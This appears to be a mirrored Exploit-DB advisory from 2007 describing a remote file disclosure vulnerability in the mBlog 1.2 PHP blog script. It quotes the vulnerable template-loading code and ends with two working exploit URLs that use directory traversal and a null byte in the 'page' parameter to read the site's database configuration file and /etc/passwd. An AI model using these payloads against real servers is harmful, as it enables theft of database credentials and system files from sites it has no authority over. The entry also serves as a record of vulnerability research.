exploit-db-mirror/platforms/php/webapps/4766.txt

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:                                                                             :
:  vuln.: mBlog 1.2 Remote File Disclosure Vulnerability                      :
:  script info and download: http://www.c97.net/dl/index.php?act=view&id=8    :
:  no dork for s-kiddie [;                                                    :
:                                                                             :
:  author: irk4z[at]yahoo.pl                                                  :
:  greets to: str0ke, wacky, wszystkich polaków ;]                            :
:                                                                             :
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# code:

  ./includes/tpl.php, 41-56:
    ...
41   // load_tpl
42   // loding a template file into a varible.
43   // use quick_tpl to display template
44  function load_tpl ($path)
45  {
46	  $tpl = '';
47	  global $tpl_block;
48
49	  if (substr ($path, -4) == '.tpl')
50	  {
51		  if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path = '../'.$path;
52		  if (!file_exists ($path)) die ("<B>Template $path not found! Contact webmaster.</B>");
53		  $fp = fopen($path,'r');
54		  while(!feof($fp)) $tpl .= fgets($fp,4096);
55		  fclose ($fp);
56	  }
    ...

load_tpl() 'loading a template file into a varible.' ;]


  ./index.php, 24-30:
    ...
24   // proses cmd
25   switch ($mode)
26   {
27	  case 'page':
28	   $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0);
29	   flush_tpl ();
30	  break;
    ...
	
file disclosure in $page :*

# exploit:

(%69%6E%63%6C%75%64%65%73 = includes)
http://[host]/[path]/index.php?mode=page&page=../../%69%6E%63%6C%75%64%65%73/db_config.php%00
http://[host]/[path]/index.php?mode=page&page=../../../../../../../../etc/passwd%00

# milw0rm.com [2007-12-21]